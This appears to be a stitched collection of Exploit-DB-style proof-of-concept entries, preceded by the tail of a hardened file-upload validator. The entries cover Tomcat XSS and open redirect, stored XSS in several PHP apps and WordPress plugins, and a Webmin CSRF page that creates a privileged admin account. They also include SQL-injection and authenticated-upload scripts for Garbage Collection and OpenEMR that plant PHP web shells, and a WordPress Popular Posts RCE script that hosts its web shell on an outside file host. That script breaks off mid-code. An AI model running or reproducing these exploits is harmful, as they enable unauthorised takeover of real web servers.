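    'shell.php' is refused, 'shell.pHP' slips through, and the web server
    still hands the .pHP file to the PHP interpreter."""
    denied = {"php", "phtml", "php5", "phar"}
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    return ext not in denied


@dataclass
class Decision:
    accepted: bool
    reason: str
    stored_name: Optional[str] = None   # server-chosen name, never the client's


def validate_upload(filename: str, content: bytes, client_content_type: str) -> Decision:
    """Hardened check. `client_content_type` is taken only to make the point
    that it is ignored: the Scheduler PoC simply claims image/png. The
    decision rests on a case-insensitive allowlist, the file's own magic
    bytes, and a server-generated filename."""
    base = os.path.basename(filename.replace("\\", "/"))  # drop any path the client sent
    ext = os.path.splitext(base)[1].lower()               # '.pHP' -> '.php'
    if ext not in ALLOWED:
        return Decision(False, f"extension {ext or '(none)'} not in allowlist")
    if not any(content.startswith(magic) for magic in ALLOWED[ext]):
        return Decision(False, "content does not match the declared image type")
    if b"<?php" in content or b"<?=" in content:
        # Defence in depth against image/PHP polyglots; the real control is
        # an upload directory that never executes scripts.
        return Decision(False, "PHP open tag embedded in image data")
    return Decision(True, "ok", secrets.token_hex(16) + ext)
```

Even with this check in place, the directory that receives uploads should not be allowed to execute scripts (or should sit outside the web root), so that a file which does get through is only ever served as static content.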
-
Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)
# Exploit Title: Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)
# Date: 05/21/2019
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93
# CVE : CVE-2019-0221

# Requirements:
# SSI support must be enabled within Apache Tomcat. SSI support is not enabled by default.
# A file (usually "*.shtml") with the "printenv" SSI directive must exist within the web application.
# The file must be accessible.

# Proof of Concept:

# Install a Java Runtime Environment (JRE)

# Download a vulnerable version of Tomcat and extract the contents

# Modify line 19 of the conf\context.xml file to globally enable privileged context
<Context privileged="true">

# Modify conf\web.xml to enable the SSI Servlet as per the Apache Tomcat User Guide

# Put the following code in "webapps/ROOT/ssi/printenv.shtml"
<html>
<body>
Echo: <!--#echo var="QUERY_STRING_UNESCAPED" -->
<br/>
<br/>
Printenv: <!--#printenv -->
</body>
</html>

# Run Tomcat
cd bin
catalina run

# Call the following URLs to observe the XSS. You may need to use FireFox. Observe the difference between the "echo" directive, which escapes properly, and the "printenv" directive, which does not escape properly
http://localhost:8080/ssi/printenv.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EXSS%3C/h1%3E%3Cbr/%3E%3Cbr/%3E
http://localhost:8080/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E
-
Apache Tomcat 9.0.0.M1 - Open Redirect
# Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect
# Date: 10/04/2018
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90
# CVE : CVE-2018-11784

# Proof of Concept:

# Identify a subfolder within your application
http://example.com/test/

# Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash
http://example.com//test

# Browse to the newly created URL and the application will perform a redirection
http://test/
-
Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS)
# Exploit Title: Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)
# Date: 08/07/2021
# Exploit Author: Subhadip Nag
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Server: XAMPP

# Description #
Zoo Management System 1.0 is vulnerable to 'Multiple' stored cross site scripting because of insufficient user supplied data.

# Proof of Concept (PoC) : Exploit #
1) Go to: http://localhost/ZMSP/zms/admin/index.php and Login (given User & password)
2) Go to: http://localhost/ZMSP/zms/admin/add-animals.php
3) Fill out Animal name, Breed and Description with the given payload: <script>alert(1)</script>
4) Go to: http://localhost/ZMSP/zms/admin/manage-animals.php
5) Stored XSS payload is fired
6) Go to: http://localhost/ZMSP/zms/admin/manage-ticket.php
7) Edit any Action field with the following payload: <script>alert(1)</script> and Update
8) Go back and again click 'Manage Type Ticket'
9) Stored XSS payload is fired
10) Go to: http://localhost/ZMSP/zms/admin/aboutus.php
11) In the Page 'Title' & 'Description', Enter the Payload: <script>alert(1)</script> and Click Update
12) Go to: http://localhost/ZMSP/zms/admin/contactus.php
13) Put the Same Payload in the Page 'Title' & 'Description' and Click Update
14) Logout and click 'Back Home'
15) Our XSS payload is successful

# Image PoC : Reference Image #
1) https://ibb.co/g4hFQDV
2) https://ibb.co/frbpf9c
3) https://ibb.co/NtKrc9C
4) https://ibb.co/cFGWhCz
5) https://ibb.co/CMXmN4f
6) https://ibb.co/C0dV0PC
7) https://ibb.co/4ZW8tb3
8) https://ibb.co/3zgFq9b
9) https://ibb.co/wS8wXj8
-
WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)
# Date: 11/07/2021
# Exploit Author: Swapnil Subhash Bodekar
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/wpfront-notification-bar/
# Version: 1.9.1.04012
# Tested on Windows
# Category: Web Application

How to reproduce vulnerability:

1. Install WordPress 5.7.2
2. Install and activate *WPFront Notification Bar* plugin.
3. Navigate to *WPFront Notification Bar* >> Setting >> notification bar and fill the required data and enter the below-mentioned payload into the Custom CSS user input field.

</textarea><script>prompt(1)</script>

4. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time the JavaScript payload is executing successfully and we are getting a pop-up.
-
Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Exploit Title: Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 12 July 2021
# Exploit Author: Subhadip Nag (mrl0s3r)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14858/invoice-system-using-phpoop-free-source-code.html
# Tested on: Server: XAMPP

# Description
# Invoice System 1.0 is vulnerable to 'Multiple' stored cross site scripting (xss) in the Settings option because of insufficient user supplied data. When anyone visits any other option like (Dashboard, Invoice, Category, Service, Product and also the Settings option), our payload will respond as well, and when anyone again logs in as Admin the payload works the same as well.

# Proof of Concept (PoC) : Exploit
# 1) Goto: http://localhost/simple_invoice/admin/login.php
2) Login: Login as an Admin with the given credentials: admin | admin123
3) Goto: Settings option
4) In the System Name & Short Name, Enter the payload: <script>+-+-1-+-+alert(1)</script>
5) Click Update
6) Our XSS attack fired and Stored
7) Wherever we click in any options, notice that our Payload responds to us
8) Goto: http://localhost/simple_invoice/admin/?page=service
9) Click Create New
10) In the Name and Description field, enter the payload: <<SCRIPT>alert("XSS");//<</SCRIPT>
11) Our XSS attack Successful
12) Goto: http://localhost/simple_invoice/admin/?page=invoice
13) Click Create New
14) In the Customer Name, Unit, Remarks, enter the payload: <script>alert(1)</script>
15) Our XSS attack Successful

# PoC image
1) https://ibb.co/JpYdZ4F
2) https://ibb.co/brm00dF
3) https://ibb.co/3crYLSZ
4) https://ibb.co/N9m6fy0
5) https://ibb.co/HGNSJDN
6) https://ibb.co/7tyFY1P
7) https://ibb.co/gZ0BvjB
8) https://ibb.co/2S9J6Xn
-
Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF)
# Exploit Title: Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF)
# Date: 24/04/2021
# Exploit Author: *Mesh3l_911 & Z0ldyck
# Vendor Homepage: https://www.webmin.com
# Repo Link: https://github.com/Mesh3l911/CVE-2021-31762
# Version: Webmin 1.973
# Tested on: All versions <= 1.973
# CVE : CVE-2021-31762
# POC: https://youtu.be/qCvEXwyaF5U

import time, subprocess

print('''\033[1;37m
 __ __ _ ____ _ _________ _ _ _ | \/ | | | |___ \| | |___ / _ \| | | | | | | \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ | |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / | | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < |_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ __/ | |___/
\033[1;m''')

for i in range(101):
    print("\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(i), "\033[1;36m%\033[1;m", end="")
    time.sleep(0.02)
print("\n\n")

target = input("\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")

if target.endswith('/'):
    target = target + 'acl/save_user.cgi'
else:
    target = target + '/acl/save_user.cgi'


def CSRF_Generator():
    with open('CSRF_POC.html', 'w') as POC:
        POC.write('''
<html>
  <head>
    <meta name="referrer" content="never">
  </head>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="''' + target + '''" method="POST">
      <input type="hidden" name="safe" value="" />
      <input type="hidden" name="name" value="Mesh3l_Z0ldyck" />
      <input type="hidden" name="pass_def" value="0" />
      <input type="hidden" name="pass" value="Mesh3l_Z0ldyck123" />
      <input type="hidden" name="real" value="Mesh3l_Z0ldyck" />
      <input type="hidden" name="cert_def" value="1" />
      <input type="hidden" name="lang_def" value="1" />
      <input type="hidden" name="lang" value="af" />
      <input type="hidden" name="notabs" value="0" />
      <input type="hidden" name="theme_def" value="1" />
      <input type="hidden" name="theme" value="" />
      <input type="hidden" name="overlay_def" value="1" />
      <input type="hidden" name="overlay" value="overlay-theme" />
      <input type="hidden" name="logouttime_def" value="1" />
      <input type="hidden" name="minsize_def" value="1" />
      <input type="hidden" name="ipmode" value="0" />
      <input type="hidden" name="ips" value="" />
      <input type="hidden" name="days_def" value="1" />
      <input type="hidden" name="hours_def" value="1" />
      <input type="hidden" name="hours_hfrom" value="" />
      <input type="hidden" name="hours_mfrom" value="" />
      <input type="hidden" name="hours_hto" value="" />
      <input type="hidden" name="hours_mto" value="" />
      <input type="hidden" name="mod" value="backup-config" />
      <input type="hidden" name="mod" value="change-user" />
      <input type="hidden" name="mod" value="webmincron" />
      <input type="hidden" name="mod" value="usermin" />
      <input type="hidden" name="mod" value="webminlog" />
      <input type="hidden" name="mod" value="webmin" />
      <input type="hidden" name="mod" value="help" />
      <input type="hidden" name="mod" value="servers" />
      <input type="hidden" name="mod" value="acl" />
      <input type="hidden" name="mod" value="bacula-backup" />
      <input type="hidden" name="mod" value="init" />
      <input type="hidden" name="mod" value="passwd" />
      <input type="hidden" name="mod" value="quota" />
      <input type="hidden" name="mod" value="mount" />
      <input type="hidden" name="mod" value="fsdump" />
      <input type="hidden" name="mod" value="ldap-client" />
      <input type="hidden" name="mod" value="ldap-useradmin" />
      <input type="hidden" name="mod" value="logrotate" />
      <input type="hidden" name="mod" value="mailcap" />
      <input type="hidden" name="mod" value="mon" />
      <input type="hidden" name="mod" value="pam" />
      <input type="hidden" name="mod" value="certmgr" />
      <input type="hidden" name="mod" value="proc" />
      <input type="hidden" name="mod" value="at" />
      <input type="hidden" name="mod" value="cron" />
      <input type="hidden" name="mod" value="sentry" />
      <input type="hidden" name="mod" value="man" />
      <input type="hidden" name="mod" value="syslog" />
      <input type="hidden" name="mod" value="syslog-ng" />
      <input type="hidden" name="mod" value="system-status" />
      <input type="hidden" name="mod" value="useradmin" />
      <input type="hidden" name="mod" value="apache" />
      <input type="hidden" name="mod" value="bind8" />
      <input type="hidden" name="mod" value="pserver" />
      <input type="hidden" name="mod" value="dhcpd" />
      <input type="hidden" name="mod" value="dhcp-dns" />
      <input type="hidden" name="mod" value="dovecot" />
      <input type="hidden" name="mod" value="exim" />
      <input type="hidden" name="mod" value="fetchmail" />
      <input type="hidden" name="mod" value="foobar" />
      <input type="hidden" name="mod" value="frox" />
      <input type="hidden" name="mod" value="jabber" />
      <input type="hidden" name="mod" value="ldap-server" />
      <input type="hidden" name="mod" value="majordomo" />
      <input type="hidden" name="mod" value="htpasswd-file" />
      <input type="hidden" name="mod" value="minecraft" />
      <input type="hidden" name="mod" value="mysql" />
      <input type="hidden" name="mod" value="openslp" />
      <input type="hidden" name="mod" value="postfix" />
      <input type="hidden" name="mod" value="postgresql" />
      <input type="hidden" name="mod" value="proftpd" />
      <input type="hidden" name="mod" value="procmail" />
      <input type="hidden" name="mod" value="qmailadmin" />
      <input type="hidden" name="mod" value="mailboxes" />
      <input type="hidden" name="mod" value="sshd" />
      <input type="hidden" name="mod" value="samba" />
      <input type="hidden" name="mod" value="sendmail" />
      <input type="hidden" name="mod" value="spam" />
      <input type="hidden" name="mod" value="squid" />
      <input type="hidden" name="mod" value="sarg" />
      <input type="hidden" name="mod" value="wuftpd" />
      <input type="hidden" name="mod" value="webalizer" />
      <input type="hidden" name="mod" value="link" />
      <input type="hidden" name="mod" value="adsl-client" />
      <input type="hidden" name="mod" value="bandwidth" />
      <input type="hidden" name="mod" value="fail2ban" />
      <input type="hidden" name="mod" value="firewalld" />
      <input type="hidden" name="mod" value="ipsec" />
      <input type="hidden" name="mod" value="krb5" />
      <input type="hidden" name="mod" value="firewall" />
      <input type="hidden" name="mod" value="firewall6" />
      <input type="hidden" name="mod" value="exports" />
      <input type="hidden" name="mod" value="exports-nfs4" />
      <input type="hidden" name="mod" value="xinetd" />
      <input type="hidden" name="mod" value="inetd" />
      <input type="hidden" name="mod" value="pap" />
      <input type="hidden" name="mod" value="ppp-client" />
      <input type="hidden" name="mod" value="pptp-client" />
      <input type="hidden" name="mod" value="pptp-server" />
      <input type="hidden" name="mod" value="stunnel" />
      <input type="hidden" name="mod" value="shorewall" />
      <input type="hidden" name="mod" value="shorewall6" />
      <input type="hidden" name="mod" value="itsecur-firewall" />
      <input type="hidden" name="mod" value="tcpwrappers" />
      <input type="hidden" name="mod" value="idmapd" />
      <input type="hidden" name="mod" value="filter" />
      <input type="hidden" name="mod" value="burner" />
      <input type="hidden" name="mod" value="grub" />
      <input type="hidden" name="mod" value="lilo" />
      <input type="hidden" name="mod" value="raid" />
      <input type="hidden" name="mod" value="lvm" />
      <input type="hidden" name="mod" value="fdisk" />
      <input type="hidden" name="mod" value="lpadmin" />
      <input type="hidden" name="mod" value="smart-status" />
      <input type="hidden" name="mod" value="time" />
      <input type="hidden" name="mod" value="vgetty" />
      <input type="hidden" name="mod" value="iscsi-client" />
      <input type="hidden" name="mod" value="iscsi-server" />
      <input type="hidden" name="mod" value="iscsi-tgtd" />
      <input type="hidden" name="mod" value="iscsi-target" />
      <input type="hidden" name="mod" value="cluster-passwd" />
      <input type="hidden" name="mod" value="cluster-copy" />
      <input type="hidden" name="mod" value="cluster-cron" />
      <input type="hidden" name="mod" value="cluster-shell" />
      <input type="hidden" name="mod" value="cluster-shutdown" />
      <input type="hidden" name="mod" value="cluster-usermin" />
      <input type="hidden" name="mod" value="cluster-useradmin" />
      <input type="hidden" name="mod" value="cluster-webmin" />
      <input type="hidden" name="mod" value="cfengine" />
      <input type="hidden" name="mod" value="heartbeat" />
      <input type="hidden" name="mod" value="shell" />
      <input type="hidden" name="mod" value="custom" />
      <input type="hidden" name="mod" value="disk-usage" />
      <input type="hidden" name="mod" value="export-test" />
      <input type="hidden" name="mod" value="ftelnet" />
      <input type="hidden" name="mod" value="filemin" />
      <input type="hidden" name="mod" value="flashterm" />
      <input type="hidden" name="mod" value="tunnel" />
      <input type="hidden" name="mod" value="file" />
      <input type="hidden" name="mod" value="phpini" />
      <input type="hidden" name="mod" value="cpan" />
      <input type="hidden" name="mod" value="htaccess-htpasswd" />
      <input type="hidden" name="mod" value="telnet" />
      <input type="hidden" name="mod" value="ssh" />
      <input type="hidden" name="mod" value="ssh2" />
      <input type="hidden" name="mod" value="shellinabox" />
      <input type="hidden" name="mod" value="status" />
      <input type="hidden" name="mod" value="ajaxterm" />
      <input type="hidden" name="mod" value="updown" />
      <input type="hidden" name="mod" value="vnc" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
''')
        POC.close()

    print("\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m")


def main():
    CSRF_Generator()


if __name__ == '__main__':
    main()
-
Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload
# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload
# Date: 05-07-2021
# Exploit Author: Luca Bernardi - bernardiluca.job at protonmail.com | luca.bernardi at dedagroup.it
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html
# POC: https://www.exploit-db.com/exploits/50085
# Tested On: Ubuntu 21.04 + Apache/2.4.46 (Ubuntu)
# Version: 1.0
#======================================================

#imports
from requests_toolbelt.multipart.encoder import MultipartEncoder
import requests
import string
import random
import os
import argparse

#generate random string 8 chars
def randomGen(size=8, chars=string.ascii_lowercase):
    return ''.join(random.choice(chars) for _ in range(size))

#generating a random username and a random web shell file
user=randomGen()
shellFile=randomGen()+".php"

#creating a payload for the login
payload = {
    "username":"a",
    "password":"a' OR 1=1 AND ucat='admin' #"
}
proxies = {"http":"http://127.0.0.1:8080"}
session=requests.Session()

#changeme
urlBase="http://172.27.1.71/Gabage/"
url=urlBase+"login.php"

print("=== executing SQL Injection ===")
req=session.post(url,payload,allow_redirects=False)
cookie=req.headers["Set-Cookie"]
print("=== authenticated admin cookie:" + cookie + " ===")

url=urlBase+"apatient/users.php?user=rayat"
mp_encoder = MultipartEncoder(
    fields = {
        "fullname":user,
        "ucat":"admin",
        "contact":"0000000000",
        "address":"aaa ave",
        "username":user,
        "acstatus":"active",
        "date":"2021-07-05",
        "password":user,
        "image":(shellFile,"<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>","application/x-php"),
        "submit":""
    }
)
headers = {
    "Cookie":cookie,
    'Content-Type': mp_encoder.content_type
}

print("=== creating user " + user + " and uploading shell " + shellFile +" ===")
req=session.post(url,data=mp_encoder,allow_redirects=False,headers=headers) #,proxies=proxies)

#curl the shell for test
requestUrl = "curl " + urlBase + "apatient/contract/"+shellFile+"?cmd=whoami"
print("=== issuing a whoami: " + requestUrl + " ===")
print("===CURL OUTPUT===")
os.system(requestUrl)
-
OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)
# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)
# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)
# Date: 2021-07-05
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml
# Version: < 5.0.1.4 (it means up to 5.0.1.3)
# Tested on: OpenEMR Version 5.0.0.8
# References: https://www.exploit-db.com/exploits/49998
# CVE: CVE-2018-15139
# CWE: CWE-434
# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485

#!/usr/bin/env ruby

require 'pathname'
require 'httpx'
require 'http/form_data'
require 'docopt'

doc = <<~DOCOPT
  OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution
  Source: https://github.com/sec-it/exploit-CVE-2019-14530

  Usage:
    #{__FILE__} exploit <url> <filename> <username> <password> [--debug]
    #{__FILE__} -h | --help

  Options:
    <url>       Root URL (base path) including HTTP scheme, port and root folder
    <filename>  Filename of the shell to be uploaded
    <username>  Username of the admin
    <password>  Password of the admin
    --debug     Display arguments
    -h, --help  Show this screen

  Examples:
    #{__FILE__} exploit http://example.org/openemr shell.php admin pass
    #{__FILE__} exploit https://example.org:5000/ shell.php admin pass
DOCOPT

def login(root_url, user, pass, http)
  vuln_url = "#{root_url}/interface/main/main_screen.php?auth=login&site=default"
  params = {
    'new_login_session_management' => '1',
    'authProvider' => 'Default',
    'authUser' => user,
    'clearPass' => pass,
    'languageChoice' => '1'
  }
  http.post(vuln_url, form: params).body.to_s
end

def upload(root_url, filepath, http)
  vuln_url = "#{root_url}/interface/super/manage_site_files.php"
  pn = Pathname.new(filepath)
  params = {
    form_image: {
      content_type: 'application/x-php',
      filename: pn.basename.to_s,
      body: pn
    },
    bn_save: 'Save'
  }
  res = http.post(vuln_url, form: params)
  return '[-] File not upload' unless (200..299).include?(res.status)

  "[+] File uploaded:\n#{root_url}/sites/default/images/#{pn.basename}"
end

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']
  if args['exploit']
    http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart)
    login(args['<url>'], args['<username>'], args['<password>'], http)
    puts upload(args['<url>'], args['<filename>'], http)
  end
rescue Docopt::Exit => e
  puts e.message
end
-
WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting
# Exploit Title: WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)
# Date: 14/07/2021
# Exploit Author: Vikas Srivastava
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/current-book/
# Version: 1.0.1
# Category: Web Application

How to Reproduce this Vulnerability:

1. Install WordPress 5.7.2
2. Install and activate Custom Book
3. Navigate to Tools >> Current Book and enter the XSS payload into the Book and Author input field.
4. Click Update Options
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time the JavaScript payload is executing successfully and we are getting a pop-up.
-
WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 15/07/2021
# Exploit Author: Simone Cristofaro
# Vendor Homepage: https://it.wordpress.org/plugins/wordpress-popular-posts/
# Software Link: https://downloads.wordpress.org/plugin/wordpress-popular-posts.5.3.2.zip
# Version: 5.3.2 or below
# Tested on: Debian 10, WordPress 5.7.2, PHP version 7.3.27
# CVE: CVE-2021-42362
# Reference: https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/

# Notes: It's required that the Popular Posts widget is active (ie. in the footer section) and gd extension for PHP is
# enabled (otherwise WPP can't generate thumbnails). Also, the authenticated user must have "Contributor" role or above.
# This script will login with the provided credentials, create a new post and add a custom field with the link to a
# web shell, that will be automatically downloaded by the server. If you don't want to upload the file, you need to
# provide a URL to a web shell with SSL support (https) and make sure it contains the file name in it. If the plugin is
# set to show a fixed number of popular posts (ie. top 5), you just need to refresh the post page to make it go up ;)

'''
Banner:
'''
banner = """
 * Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated)
 * @Heisenberg
"""
print(banner)

'''
Import required modules:
'''
import requests
import argparse
import json
import re

'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated)')
my_parser.add_argument('-t', help='--Target IP', metavar='IP', type=str, required=True, dest="target_ip")
my_parser.add_argument('-p', help='--Target port', type=str, metavar='PORT', default='80', dest="target_port")
my_parser.add_argument('-w', help='--Wordpress path (ie. /wordpress/)', metavar='PATH', type=str, required=True, dest="wp_path")
my_parser.add_argument('-U', help='--Username', metavar='USER', type=str, required=True, dest="username")
my_parser.add_argument('-P', help='--Password', metavar='PASS', type=str, required=True, dest="password")
args = my_parser.parse_args()

target_ip = args.target_ip
target_port = args.target_port
wp_path = args.wp_path
username = args.username
password = args.password

'''
# Hard coded parameters (if you don't like command line execution)
target_ip = "localhost"
target_port = "80"
wp_path = "/wordpress/"
username = "heisenberg"
password = "heisenberg"
'''

shell_name = 'exploit.gif.php'
payload = 'GIF <html> <body> <form method="GET" name="<?php echo basename($_SERVER[\'PHP_SELF\']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET[\'cmd\'])) { system($_GET[\'cmd\']); } ?> </pre> </body> </html>'

print('')
print('[*] Starting Exploit:')

'''
Upload file
'''
file_json = requests.post('https://api.bayfiles.com/upload', files={ 'file' : (shell_name, payload)})
resp = json.loads(file_json.text)
if resp['status']:
    urlshort = resp['data']['file']['url']['full']
else:
    print(f'[-] Error:'+ resp['error']['message'])
    exit()
file_uploaded_site = requests.get(urlshort).text
PHP_URL = re.findall(r"(https?://\S+)("+shell_name+")", file_uploaded_site)[0][0] + shell_name
print(f'[+] Web Shell successfully uploaded at [{PHP_URL}].')

'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'

# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Monies Browser 1.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}

# Authenticate:
auth = session.post(auth_url, headers=header, data=body)
auth_header = auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
    print(f'[+] Authentication successful as user [{username}] !')
else:
    print('[-] Authentication failed ! Check username and password')
    exit()

'''
Verify that the requirements are installed
'''
settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=debug'
settings_page = session.get(settings_page_url).text
search_string = ' gd'
if settings_page.find(search_string) == -1 :
    print('[-] Error, gd extension for PHP is not installed/enabled on the server ! WPP can\'t generate thumbnails.')
    exit()

'''
Get the wpp-admin-token
'''
settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools'
settings_page = session.get(settings_page_url).text
search_string = '<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="'
search_string_end = '" />'
settings_page = settings_page[settings_page.find(search_string):]
wpp_admin_token = settings_page[72: settings_page.find(search_string_end)]
if wpp_admin_token:
    print(f'[+] Acquired wpp-admin-token [{wpp_admin_token}].')
else:
    print('[-] Error while gathering wpp-admin-token !')
    exit()

'''
Apply changes to the Popular Posts plugin
'''
body = {
    'upload_thumb_src': '',
    'thumb_source': 'custom_field',
    'thumb_lazy_load': 1,
    'thumb_field': 'wpp_thumbnail',
    'thumb_field_resize': 1,
    'section': 'thumb',
    'wpp-admin-token': wpp_admin_token
}
applied_changes = session.post(settings_page_url, headers=header, data=body).text
# str.find() returns -1 when the marker is absent, so compare explicitly instead of relying on truthiness
if applied_changes.find('<div class="notice notice-success is-dismissible"><p><strong>Settings saved.') != -1:
    print(f'[+] Settings applied successfully to the Popular Posts plugin. ')
else:
    print('[-] Error while applying settings to the Popular Posts plugin!')
    exit()

'''
Empty image cache
'''
body = {
    'action': 'wpp_clear_thumbnail',
    'wpp-admin-token': wpp_admin_token
}
applied_changes = session.post(settings_page_url, headers=header, data=body).text
print(f'[+] Images cache cleared. ')

'''
Get the new post ID and Nonce
'''
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/post-new.php'
new_post_page = session.get(new_post_url).text

search_string = 'name="_ajax_nonce-add-meta" value="'
search_string_end = '" />'
new_post_page = new_post_page[new_post_page.find(search_string)+35:]
ajax_nonce = new_post_page[:new_post_page.find(search_string_end)]

search_string = 'wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "'
search_string_end = '" );'
new_post_page = new_post_page[new_post_page.find(search_string)+66:]
wp_nonce = new_post_page[:new_post_page.find(search_string_end)]

search_string = '},"post":{"id":'
search_string_end = ','
new_post_page = new_post_page[new_post_page.find(search_string)+15:]
post_ID = new_post_page[:new_post_page.find(search_string_end)]

if post_ID and wp_nonce and ajax_nonce:
    print(f'[+] Acquired new post ID [{post_ID}], WP Nonce [{wp_nonce}] and AJAX Nonce [{ajax_nonce}].')
else:
    if not post_ID:
        print('[-] Error while gathering post_ID !')
    elif not wp_nonce:
        print('[-] Error while gathering Wordpress Nonce !')
    elif not ajax_nonce :
        print('[-] Error while gathering Wordpress AJAX Nonce !')
    exit()

'''
Publish a new post
'''
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wp/v2/posts/'+post_ID+'?_locale=user'
data = {"id":post_ID,"title":"I'm the one who knocks","content":"<!-- wp:paragraph -->\n<p>upgrade your plugins</p>\n<!-- /wp:paragraph -->","status":"publish"}
header['X-WP-Nonce'] = wp_nonce
header['Content-Type'] = 'application/json'
header['X-HTTP-Method-Override'] = 'PUT'
new_post_page = session.post(new_post_url, headers=header, json=data).text
# same -1 check as above: the original truthiness test treated "not found" as success
if new_post_page.find('"status":"publish"') != -1:
    print(f'[+] New post named [I\'m the one who knocks] published correctly!')
else:
    print('[-] Error while publishing the new post !')
    exit()

'''
Add the Custom Field
'''
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'
header.pop('X-WP-Nonce')
